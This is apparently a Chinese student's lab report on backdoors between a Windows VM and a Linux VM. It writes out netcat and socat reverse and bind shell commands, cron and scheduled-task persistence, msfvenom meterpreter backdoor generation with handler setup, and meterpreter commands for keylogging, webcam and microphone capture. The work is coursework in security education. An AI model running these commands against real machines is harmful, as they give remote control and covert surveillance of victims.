(1)使用nc實現win,Linux間的後門鏈接。 熱身linux
(2)使用netcat獲取主機操做Shell,cron啓動。web
(3)使用socat獲取主機操做Shell, 任務計劃啓動。shell
(4)使用MSF meterpreter生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shellvim
(5)使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權windows
(1)例舉你能想到的一個後門進入到你係統中的可能方式?安全
在下載軟件時,後門捆綁在下載的軟件上,與軟件一塊兒安裝進入了系統。tcp
(2)例舉你知道的後門如何啓動起來(win及linux)的方式?編輯器
windows:實驗中作過的方式有直接雙擊開啓後門程序、經過Windows->控制面板->管理工具啓動任務計劃程序、開機自啓動的後門、和其餘程序捆綁運行的後門程序等。
linux:經過在cron中添加任務,定時執行、經過一些腳本啓動後門程序、經過和其餘程序捆綁運行後門程序。工具
(3)Meterpreter有哪些給你映像深入的功能?網站
獲取攝像頭權限進行拍照;其實它的全部功能都使人印象深入和懼怕。
(4)如何發現本身有系統有沒有被安裝後門?
殺毒軟件吧;監控是否有進程異常,數據流異常以及開機自啓動項。
準備工做:因爲不想用本身電腦的Windows,我就安裝了一個Windows系統的虛擬機;在Windows虛擬機上安裝netcat和socat。
1.獲取Windows和Linux的IP
(1)在Windows下,先使用ipconfig指令查看本機;在Linux下,使用ifconfig指令查看地址。
Windows的IP:192.168.219.131 ;Linux:192.168.219.128
2.使用ncat,使Windows得到Linux操做shell
(1)win中使用ncat監聽4314端口:ncat.exe -l -p 4314
(2)在Linux終端窗口使用 nc 192.168.219.131 4314 -e /bin/sh
命令去鏈接Win的4314端口
結果:Windows成功得到Linux操做shell,可以進行操做。
3.Linux得到Windows shell
(1)在Linux中監聽4314端口:nc -l -p 4314
(2)在Windows輸入指令 ncat.exe -e cmd.exe 192.168.219.128 4314 反彈鏈接Linux的4314端口(指令中的ip地址需爲Linux ip)
結果:虛擬機(Linux)成功得到本機(Windows)操做shell,可以執行Windows中的命令。
4.使用nc傳輸數據
netcat根據課上所學簡單來說,就是利用TCP、UDP鏈接進行基本的數據收發,在兩臺主機之間傳輸字符文件之類的,因此咱們在這裏嘗試用它在win和linux之間作一個後門。
雙向傳輸字符串:
5.以定時任務cron的形式啓動netcat獲取主機操做Shell
(1)先在Windows系統下,監聽4318端口:
(2)在Linux終端輸入 crontab -e,選擇3,也就是基本的vim編輯器;
(3)vim編輯器中用 i 改成插入模式,在最後一行插入17 13 24 3 * /bin/netcat 192.168.219.131 4314 -e /bin/sh ,意思是在3月24號的13點17分反向鏈接Windows本機的4314
端口,就會啓動cron
。
(4)當時間到了13點17分時,此時已經得到了shell,能夠輸入指令。
(1)在Windows系統下,打開控制面板->管理工具->任務計劃程序,建立任務,填寫任務名稱後,新建一個觸發器:
(2)在操做->程序或腳本中選擇你的socat.exe文件的路徑,在添加參數一欄填寫tcp-listen:4314 exec:cmd.exe,pty,stderr,這個命令的做用是把cmd.exe綁定到端口4314
,同時把cmd.exe的stderr重定向到stdout上;(此處應有圖,但我找不到了·······)
(3)建立完成以後,再次打開時,能夠發現以前建立的任務已經開始運行了;
(4)此時,在Linux下輸入指令 socat - tcp:192.168.219.131 4314 ,這裏的第一個參數-表明標準的輸入輸出,第二個流鏈接到Windows主機的4314端口,此時能夠發現已經成功得到了一個cmd shell
(1)輸入指令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.219.128 LPORT=4314 -f exe > 20164314——backdoor.exe 生成後門程序:
(2)經過nc指令將生成的後門程序傳送到Windows主機上:(在作這一步以前先將本機的殺毒軟件和防火牆關閉!)
(3)在Linux上使用 msfconsole 指令進入msf控制檯,使用監聽模塊,設置payload,設置反彈回連的IP和端口:
use exploit/multi/handler:進入handler模式
set payload windows/meterpreter/reverse_tcp:設置payload
set LHOST 192.168.174.129:設置LHOST
set LPORT 4318:設置LPORT
exploit:MSF開始監聽
(4)設置完成後,執行監聽;
(5)打開Windows上的後門程序;
(6)此時Linux上已經得到了Windows的鏈接,而且獲得了遠程控制的shell:(此處忘記截圖了····)
(1)使用 record_mic 指令能夠截獲一段音頻;
(2)使用 screenshot 指令能夠進行截屏;
(3)使用 webcam_snap 指令可使用攝像頭進行錄像;
(4)使用 keyscan_start 指令能夠記錄下擊鍵的過程;
(5)使用 keyscan_dump 指令能夠讀取擊鍵的記錄
4.實驗感想
此次實驗讓我收穫良多,首先我知道了後門的原理而且進行了簡單的實踐,掌握了使用nc實現Windows和Linux之間的後門鏈接,其次我學會了meterpreter的使用,還掌握了MSF POST模塊的簡單使用。此次實驗讓我意識到了保護本身電腦主機的重要性,防火牆和殺毒軟件並不是至關可靠,從此不能輕易點開陌生人發的連接,不瀏覽不安全的網站,努力培養信息安全意識,提高自身信息安全方面的素養。